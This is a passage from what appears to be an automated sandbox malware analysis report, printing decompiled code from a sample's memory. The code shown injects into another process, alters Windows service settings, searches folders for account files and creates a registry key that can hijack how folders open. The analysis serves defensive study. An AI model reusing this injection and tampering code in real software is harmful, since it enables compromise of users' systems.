					__imp__EnumServicesStatusExW(_t90, 0, 0x30, 3, _t112, _t114, _t69,  &_v8,  &_v16, 0);
					if(_t69 == 0 && GetLastError() != 0xea) {
						goto L9;
					}
					CloseServiceHandle(_t90);
					_t115 = 0;
					if(_v8 <= 0) {
						goto L9;
					}
					_t91 = _t112;
					while( *_t91 != 0) {
						E010336F7( &_v12,  *_t91);
						if(E0103335A( &_v12, _v32) != 0) {
							_t116 = _t115 * 0x2c;
							E01033549( &_v24, E010336F7( &_v28,  *((intOrPtr*)(_t116 + _t112))));
							E01035FEB(_v28);
							_t92 = _v44;
							_v28 = _v28 & 0x00000000;
							 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t116 + _t112 + 0x24));
							E01035FEB(_v12);
							_v12 = _v12 & 0x00000000;
							if( *((intOrPtr*)(_t92 + 0x2c)) != 0) {
								_t105 = _v8;
								_t117 = 0;
								if(_t105 == 0) {
									goto L10;
								}
								while( *_t112 != 0) {
									if( *((intOrPtr*)(_t112 + 0x24)) !=  *((intOrPtr*)(_t92 + 0x2c))) {
										L21:
										_t117 = _t117 + 1;
										_t112 = _t112 + 0x2c;
										if(_t117 < _t105) {
											continue;
										}
										goto L10;
									}
									E010336F7( &_v12,  *_t112);
									if(lstrcmpW(_v12, _v24) != 0) {
										E010336F7(_t119,  *_t112);
										E0103221A(_t92 + 0x44,  &_v12);
									}
									E01035FEB(_v12);
									_v12 = _v12 & 0x00000000;
									_t105 = _v8;
									goto L21;
								}
								goto L10;
							}
							if(_v36 == 1) {
								goto L9;
							}
							E0103D33C(_v32, 2);
							E0103D3A8(_v32);
							_v36 = 1;
							E01031099(_t112);
							_t90 = OpenSCManagerW(0, L"ServicesActive", 5);
							if(_t90 != 0) {
								goto L2;
							}
							goto L9;
						}
						E01035FEB(_v12);
						_v12 = _v12 & 0x00000000;
						_t91 = _t91 + 0x2c;
						_t115 = _t115 + 1;
						if(_t115 < _v8) {
							continue;
						}
						goto L9;
					}
					goto L9;
				}
				goto L9;
			}

0x0103d906
0x0103d910
0x0103d913
0x0103d916
0x0103d919
0x0103d91c
0x0103d91f
0x0103d928
0x0103d92c
0x0103d9dc
0x0103d9dc
0x0103d9e0
0x0103d9e3
0x0103d9ef
0x0103d9ef
0x0103d935
0x0103d93c
0x0103d93f
0x0103d93f
0x0103d949
0x0103d959
0x0103d95f
0x0103d964
0x0103d96b
0x0103d975
0x0103d982
0x0103d98a
0x00000000
0x00000000
0x0103d99a
0x0103d9a0
0x0103d9a5
0x00000000
0x00000000
0x0103d9a7
0x0103d9a9
0x0103d9b3
0x0103d9c5
0x0103d9f0
0x0103da02
0x0103da0a
0x0103da0f
0x0103da19
0x0103da1d
0x0103da20
0x0103da25
0x0103da2d
0x0103da70
0x0103da73
0x0103da77
0x00000000
0x00000000
0x0103da7d
0x0103da8c
0x0103dac9
0x0103dac9
0x0103daca
0x0103dacf
0x00000000
0x00000000
0x00000000
0x0103dad1
0x0103da93
0x0103daa6
0x0103daad
0x0103dab5
0x0103dab5
0x0103dabd
0x0103dac2
0x0103dac6
0x00000000
0x0103dac6
0x00000000
0x0103da7d
0x0103da35
0x00000000
0x00000000
0x0103da3d
0x0103da43
0x0103da49
0x0103da4c
0x0103da61
0x0103da65
0x00000000
0x00000000
0x00000000
0x0103da6b
0x0103d9ca
0x0103d9cf
0x0103d9d3
0x0103d9d6
0x0103d9da
0x00000000
0x00000000
0x00000000
0x0103d9da
0x00000000
0x0103d9a9
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005), ref: 0103D922
EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,00000000,?,?,?,00000000), ref: 0103D959

Part of subcall function 01036045: GetProcessHeap.KERNEL32(00000008,?,010330E2,01035B80,?,?,0104191C,01035B80,?,?,76B30770,00000000,?,01035B80,00000000), ref: 01036048
Part of subcall function 01036045: RtlAllocateHeap.NTDLL(00000000,?,0104191C,01035B80,?,?,76B30770,00000000,?,01035B80,00000000), ref: 0103604F

EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,00000000,?,?,?,?,00000000), ref: 0103D982
GetLastError.KERNEL32 ref: 0103D98C
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D99A
OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,00000000,00000000), ref: 0103DA5B
lstrcmpW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0103DA9E

Strings

ServicesActive, xrefs: 0103D90A, 0103DA54
@Mqt, xrefs: 0103D98C

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: EnumHeapManagerOpenServicesStatus$AllocateCloseErrorHandleLastProcessServicelstrcmp
String ID: @Mqt$ServicesActive
API String ID: 899334174-1382913386
Opcode ID: c5a050a5e9884b9cf1c12e46f6d248d00da954e2b2e250559da33eee5297cb0a
Instruction ID: 029f917f2a32aaf09b00a67b4ad6e24cdf90a5cee9b1dd4672387ad9f11048f1
Opcode Fuzzy Hash: c5a050a5e9884b9cf1c12e46f6d248d00da954e2b2e250559da33eee5297cb0a
Instruction Fuzzy Hash: 23517EB590020AEFDB15DFE4C995BEEBBBDFF58301F10016AE581B6290DB746A41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01037D5E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E01037D5E(void* __ecx, long __edx, long _a4) {
				long _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				signed int _t17;
				void* _t19;
				void* _t22;
				long _t32;
				_Unknown_base(*)()* _t38;
				void* _t40;

				_t32 = __edx;
				_v24 = __ecx;
				if( *0x1056754 == 0) {
					 *0x1056754 = E0103FB98() != 0;
				}
				_t17 = OpenProcess(0x1fffff, 0, _a4);
				_t40 = _t17;
				if(_t40 != 0) {
					_t38 = VirtualAllocEx(_t40, 0, 0x100000, 0x3000, 0x40);
					if(_t38 == 0) {
						L12:
						_push(0xfffffffe);
						L13:
						_pop(_t19);
						L14:
						return _t19;
					}
					_v16 = _v16 & 0x00000000;
					VirtualProtectEx(_t40, _t38, 0x100000, 0x40,  &_v16);
					_t22 = VirtualAllocEx(_t40, 0x33370000, 0x100, 0x3000, 0x40);
					_v20 = _t22;
					if(_t22 == 0) {
						goto L12;
					}
					_v8 = _v8 & 0x00000000;
					if(WriteProcessMemory(_t40, _v20, "XXXXXX", E01031133("XXXXXX"),  &_v8) == 0 || _v8 != E01031133("XXXXXX")) {
						L11:
						_push(0xfffffffd);
						goto L13;
					} else {
						_v12 = _v12 & 0x00000000;
						if(WriteProcessMemory(_t40, _t38, _v24, _t32,  &_v12) == 0 || _v12 != _t32) {
							goto L11;
						} else {
							_t19 = CreateRemoteThread(_t40, 0, 0, _t38, 0, 0, 0);
							goto L14;
						}
					}
				} else {
					return _t17 | 0xffffffff;
				}
			}

0x01037d6d
0x01037d6f
0x01037d72
0x01037d7b
0x01037d7b
0x01037d8c
0x01037d92
0x01037d96
0x01037db6
0x01037dba
0x01037e5f
0x01037e5f
0x01037e61
0x01037e61
0x01037e62
0x00000000
0x01037e62
0x01037dc0
0x01037dd1
0x01037de9
0x01037def
0x01037df4
0x00000000
0x00000000
0x01037df6
0x01037e1b
0x01037e5b
0x01037e5b
0x00000000
0x01037e2d
0x01037e2d
0x01037e43
0x00000000
0x01037e4a
0x01037e53
0x00000000
0x01037e53
0x01037e43
0x01037d98
0x00000000
0x01037d98

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,?,?,?,?,?), ref: 01037D8C

Part of subcall function 0103FB98: GetCurrentProcess.KERNEL32(0105697C,01037B45,00000000,00000000,00000000), ref: 0103FB9D
Part of subcall function 0103FB98: IsWow64Process.KERNEL32(00000000), ref: 0103FBA4
Part of subcall function 0103FB98: GetProcessHeap.KERNEL32 ref: 0103FBAA

VirtualAllocEx.KERNEL32(00000000,00000000,00100000,00003000,00000040,00000000), ref: 01037DB0
VirtualProtectEx.KERNEL32(00000000,00000000,00100000,00000040,00000000), ref: 01037DD1
VirtualAllocEx.KERNEL32(00000000,33370000,00000100,00003000,00000040), ref: 01037DE9
WriteProcessMemory.KERNEL32(00000000,00000000,XXXXXX,00000000,00000000), ref: 01037E13
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 01037E3B
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01037E53

Strings

XXXXXX, xrefs: 01037DFE, 01037E0A, 01037E1D

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AllocMemoryWrite$CreateCurrentHeapOpenProtectRemoteThreadWow64
String ID: XXXXXX
API String ID: 813767414-582547948
Opcode ID: 40e6ededf2d44355b81cec958432f0a3f24973d4e8d0a51cebfd5050e4e57d7a
Instruction ID: fd1695c89646298f56bd89469be4a7bd7cc76c8f5b88f9d45c33a70de8e10b3e
Opcode Fuzzy Hash: 40e6ededf2d44355b81cec958432f0a3f24973d4e8d0a51cebfd5050e4e57d7a
Instruction Fuzzy Hash: B82193F9501209BFEB3257A48D44FBF7A7CAB85B25F100295F690E10C4D7B49A0087B5

Uniqueness

Uniqueness Score: -1.00%

Function 0103955B Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103955B(intOrPtr __ecx) {
				char _v272;
				struct _WIN32_FIND_DATAA _v592;
				char _v856;
				char _v1120;
				intOrPtr _t31;
				void* _t36;

				_t31 = __ecx;
				GetFullPathNameA(0x1056760, 0x104,  &_v856, 0);
				PathCombineA( &_v1120,  &_v856, "*");
				_t36 = FindFirstFileA( &_v1120,  &_v592);
				if(_t36 != 0xffffffff) {
					do {
						if((_v592.dwFileAttributes | 0x00000010) == 0x10 && _v592.cFileName != 0x2e) {
							PathCombineA( &_v272, 0x1056760,  &(_v592.cFileName));
							PathCombineA( &_v272,  &_v272, "Accounts\\Account.rec0");
							E01039244(_t31,  &_v272);
						}
					} while (FindNextFileA(_t36,  &_v592) != 0);
				}
				return 0;
			}

0x0103957a
0x0103957c
0x0103959b
0x010395b1
0x010395b6
0x010395b8
0x010395c4
0x010395e2
0x010395f1
0x010395fc
0x010395fc
0x0103960f
0x010395b8
0x01039619

APIs

GetFullPathNameA.KERNEL32(01056760,00000104,?,00000000), ref: 0103957C
PathCombineA.SHLWAPI(?,?,01048F18), ref: 0103959B
FindFirstFileA.KERNEL32(?,?), ref: 010395AB
PathCombineA.SHLWAPI(?,01056760,0000002E), ref: 010395E2
PathCombineA.SHLWAPI(?,?,Accounts\Account.rec0), ref: 010395F1

Part of subcall function 01039244: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 01039261
Part of subcall function 01039244: GetLastError.KERNEL32 ref: 0103926E
Part of subcall function 01039244: CloseHandle.KERNEL32(00000000), ref: 01039275

FindNextFileA.KERNEL32(00000000,?), ref: 01039609

Strings

., xrefs: 010395C6
Accounts\Account.rec0, xrefs: 010395E4

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Path$CombineFile$Find$CloseCreateErrorFirstFullHandleLastNameNext
String ID: .$Accounts\Account.rec0
API String ID: 3873318193-2526347284
Opcode ID: 45337b12b0df91dce2b584c8fccf33c673bf5a7cd8b8bb019647604d37a26b71
Instruction ID: 227ba940e840e213d547833b2ced360d21fd0be7a8b08ac8982540291a6fa363
Opcode Fuzzy Hash: 45337b12b0df91dce2b584c8fccf33c673bf5a7cd8b8bb019647604d37a26b71
Instruction Fuzzy Hash: 221182B6A0121CABDB30D6A4DDC8EEB77ACEB44314F4044E6E645D2180E7B49A888F60

Uniqueness

Uniqueness Score: -1.00%

Function 01043F7F Relevance: 13.6, APIs: 9, Instructions: 81
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01043F7F(long __edx) {
				void* _v8;
				long _v12;
				char _v268;
				void _v272;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t37;

				_t33 = OpenProcess(0x1fffff, 0, __edx);
				_v8 = _t33;
				_v272 = GetCurrentProcessId();
				_t35 = E01031085(0xff);
				GetModuleFileNameA(0, _t13, 0xff);
				E010311A4( &_v268, _t35);
				_t27 = VirtualAllocEx(_t33, 0, 0x800, 0x3000, 0x40);
				WriteProcessMemory(_t33, _t27, 0x1056208, 0x800, 0);
				VirtualProtectEx(_v8, _t27, 0x800, 0x40,  &_v12);
				_t37 = VirtualAllocEx(_v8, 0, 0x103, 0x3000, 4);
				WriteProcessMemory(_v8, _t37,  &_v272, 0x103, 0);
				_t9 = _t27 + 0x10e; // 0x10e
				_t25 = CreateRemoteThread(_v8, 0, 0, _t9, _t37, 0, 0);
				 *0x1189cb4 = _t25;
				return _t25;
			}

0x01043f99
0x01043f9b
0x01043fa9
0x01043fb7
0x01043fbc
0x01043fca
0x01043ff4
0x01043ffe
0x0104400f
0x0104402a
0x0104403c
0x01044040
0x0104404f
0x01044057
0x0104405e

APIs

OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000,76B30770,00000000), ref: 01043F93
GetCurrentProcessId.KERNEL32 ref: 01043F9E

Part of subcall function 01031085: GetProcessHeap.KERNEL32(00000000,?,010434B7,00400000,?,?,00000000,?,?,01045553), ref: 0103108B
Part of subcall function 01031085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,01045553), ref: 01031092

GetModuleFileNameA.KERNEL32(00000000,00000000,000000FF), ref: 01043FBC
VirtualAllocEx.KERNEL32(00000000,00000000,00000800,00003000,00000040), ref: 01043FE6
WriteProcessMemory.KERNEL32(00000000,00000000,01056208,00000800,00000000), ref: 01043FFE
VirtualProtectEx.KERNEL32(01043F7A,00000000,00000800,00000040,?), ref: 0104400F
VirtualAllocEx.KERNEL32(01043F7A,00000000,00000103,00003000,00000004), ref: 01044026
WriteProcessMemory.KERNEL32(01043F7A,00000000,?,00000103,00000000), ref: 0104403C
CreateRemoteThread.KERNEL32(01043F7A,00000000,00000000,0000010E,00000000,00000000,00000000), ref: 0104404F

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Process$Virtual$AllocHeapMemoryWrite$AllocateCreateCurrentFileModuleNameOpenProtectRemoteThread
String ID:
API String ID: 900395357-0
Opcode ID: 4b54638f7292b04c48a629ca0938bc8fffb5eee69949eae8c3baefa1db55b031
Instruction ID: d12cae1a29f9dc7c83fcc0895f7e6a74bf147979d9357df584c752e647691ded
Opcode Fuzzy Hash: 4b54638f7292b04c48a629ca0938bc8fffb5eee69949eae8c3baefa1db55b031
Instruction Fuzzy Hash: A221AEB5641208BFF7309B61DD4AFEB7E6CEB44B20F200165B644AA0C0DAF52E408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0103D33C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0103D33C(short** _a4, int _a8) {
				void* _t3;
				short* _t9;
				void* _t12;
				short* _t14;
				void* _t16;

				_t14 = 0;
				_t3 = OpenSCManagerW(0, L"ServicesActive", 1);
				_t16 = _t3;
				if(_t16 != 0) {
					_t12 = OpenServiceW(_t16,  *_a4, 2);
					if(_t12 != 0) {
						if(ChangeServiceConfigW(_t12, 0xffffffff, _a8, 0xffffffff, 0, 0, 0, 0, 0, 0, 0) != 0) {
							_t14 = 1;
						}
						CloseServiceHandle(_t16);
						CloseServiceHandle(_t12);
						_t9 = _t14;
					} else {
						CloseServiceHandle(_t16);
						_t9 = 0;
					}
					return _t9;
				}
				return _t3;
			}

0x0103d348
0x0103d34b
0x0103d351
0x0103d355
0x0103d366
0x0103d36a
0x0103d38e
0x0103d392
0x0103d392
0x0103d39a
0x0103d39d
0x0103d39f
0x0103d36c
0x0103d36d
0x0103d373
0x0103d373
0x00000000
0x0103d3a1
0x0103d3a5

APIs

OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001), ref: 0103D34B
OpenServiceW.ADVAPI32(00000000,?,00000002), ref: 0103D360
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D36D
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0103D386
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D39A
CloseServiceHandle.ADVAPI32(00000000), ref: 0103D39D

Strings

ServicesActive, xrefs: 0103D343

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID: ServicesActive
API String ID: 493672254-3071072050
Opcode ID: 531cfd36cf4baaa17d7a6281fd5d90b2f3a463b2bd1bd3a767411ab96d070db5
Instruction ID: e95a2fefd24bfe560e39ab85fd18f914917610e6bd2c4b597ac848fa9ed7eaae
Opcode Fuzzy Hash: 531cfd36cf4baaa17d7a6281fd5d90b2f3a463b2bd1bd3a767411ab96d070db5
Instruction Fuzzy Hash: 93F0F6B9305225BBD7311ABAADC8E5B3F9CDBC57707404261FA91D6180CB65CC0087E0

Uniqueness

Uniqueness Score: -1.00%

Function 01042155 Relevance: 12.0, APIs: 8, Instructions: 45
processstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E01042155(WCHAR** __ecx) {
				short _v524;
				intOrPtr _v552;
				void* _v560;
				int _t9;
				WCHAR* _t10;
				WCHAR** _t18;
				void* _t20;

				_t18 = __ecx;
				_v560 = 0x22c;
				_t20 = CreateToolhelp32Snapshot(2, 0);
				if(_t20 == 0xffffffff) {
					L6:
					return 0;
				}
				_push( &_v560);
				_t9 = Process32FirstW(_t20);
				while(_t9 != 0) {
					_t10 = CharLowerW( *_t18);
					if(lstrcmpW(CharLowerW( &_v524), _t10) == 0) {
						CloseHandle(_t20);
						return _v552;
					}
					_t9 = Process32NextW(_t20,  &_v560);
				}
				CloseHandle(_t20);
				goto L6;
			}

0x01042164
0x01042166
0x01042176
0x0104217b
0x010421c7
0x00000000
0x010421c7
0x01042183
0x01042185
0x010421bc
0x0104218f
0x010421ac
0x010421ce
0x00000000
0x010421d4
0x010421b6
0x010421b6
0x010421c1
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01042170
Process32FirstW.KERNEL32(00000000,0000022C), ref: 01042185
CharLowerW.USER32(00000000,?,00000000), ref: 0104218F
CharLowerW.USER32(?,00000000,?,00000000), ref: 0104219D
lstrcmpW.KERNEL32(00000000,?,00000000), ref: 010421A4
Process32NextW.KERNEL32(00000000,0000022C), ref: 010421B6
CloseHandle.KERNEL32(00000000,?,00000000), ref: 010421C1
CloseHandle.KERNEL32(00000000,?,00000000), ref: 010421CE

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: CharCloseHandleLowerProcess32$CreateFirstNextSnapshotToolhelp32lstrcmp
String ID:
API String ID: 1363071124-0
Opcode ID: 8f11263e1b77ea0835e4d173da5cdc072c4731350978dd07a83f997a195d359a
Instruction ID: ef1dbbb1aad35d8d2aaa958db2fa5850265fef4d2dbe5657f3c9af3a6178905e
Opcode Fuzzy Hash: 8f11263e1b77ea0835e4d173da5cdc072c4731350978dd07a83f997a195d359a
Instruction Fuzzy Hash: C8018FF9601124ABD7216FB9BECCE9E7BBCEF09351F0001A0F691D1094D73999448BB0

Uniqueness

Uniqueness Score: -1.00%

Function 01042E91 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01042E91() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SECURITY_DESCRIPTOR* _v20;
				struct _SECURITY_ATTRIBUTES _v24;
				struct _SECURITY_DESCRIPTOR _v44;
				long _t20;

				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
					L5:
					return 0;
				} else {
					_v24 = 0xc;
					_v20 =  &_v44;
					_v16 = 0;
					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
					if(_t20 != 0) {
						SetLastError(_t20);
						goto L5;
					}
					RegCloseKey(_v8);
					return 1;
				}
			}

0x01042ea6
0x01042f08
0x00000000
0x01042ebc
0x01042ebf
0x01042ec6
0x01042ed0
0x01042eea
0x01042ef2
0x01042f02
0x00000000
0x01042f02
0x01042ef7
0x00000000
0x01042efd

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,01043187), ref: 01042E9E
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,01043187), ref: 01042EB2
RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,01043187,?), ref: 01042EEA
RegCloseKey.ADVAPI32(01043187), ref: 01042EF7
SetLastError.KERNEL32(00000000), ref: 01042F02

Strings

Software\Classes\Folder\shell\open\command, xrefs: 01042EE0

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
String ID: Software\Classes\Folder\shell\open\command
API String ID: 1473660444-2536721355
Opcode ID: 4a4a2b8eac5896e59d687fed90fa7b101e283bf31b45c4820f2cdce5ed178e22
Instruction ID: 61db8ef8ced7c9e2df78b347ee0e8b7c7738d409a99ccb3a4b731545816d94e3
Opcode Fuzzy Hash: 4a4a2b8eac5896e59d687fed90fa7b101e283bf31b45c4820f2cdce5ed178e22
Instruction Fuzzy Hash: 180108B9A01228EBDB209FA29D89EDF7FBCEB09650F400465F946E2141E7759644CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0103C419 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0103C1C4,?), ref: 0103C436
BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0103C1C4,?), ref: 0103C44F
BCryptGenerateSymmetricKey.BCRYPT(00000020,0103C1C4,00000000,00000000,?,00000020,00000000,?,0103C1C4,?), ref: 0103C464

Strings

AES, xrefs: 0103C42C
ChainingMode, xrefs: 0103C448
ChainingModeGCM, xrefs: 0103C443

Memory Dump Source

Source File: 00000001.00000002.808572845.0000000001031000.00000020.00000001.01000000.00000003.sdmp, Offset: 01030000, based on PE: true

Associated: 00000001.00000002.808567637.0000000001030000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808589184.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808596653.000000000104C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808605962.000000000118A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.808622748.000000000118B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1030000_ax4BSyUKd4.jbxd

Yara matches

Similarity

API ID: Crypt$AlgorithmGenerateOpenPropertyProviderSymmetric
String ID: AES$ChainingMode$ChainingModeGCM
API String ID: 1692524283-1213888626
Opcode ID: a200b116ad04180a4837ad407ad8c068735a061300cccca7cfce9ddff5be8771
Instruction ID: 2f61378388e68a4f6683f0da11a7efae9b20ffe2ca8a81159236c05f43137eef
Opcode Fuzzy Hash: a200b116ad04180a4837ad407ad8c068735a061300cccca7cfce9ddff5be8771
Instruction Fuzzy Hash: 62F0FC75300321BFEB340F5BCC8AE97BFACDF4AA91700802AF545E1100D7B1580087E0

Uniqueness

Uniqueness Score: -1.00%

Function 0103C6BD Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0103C6BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v10;
				char _v12;
				long _v16;
				void* _v20;
				intOrPtr _v60;
				intOrPtr _v64;
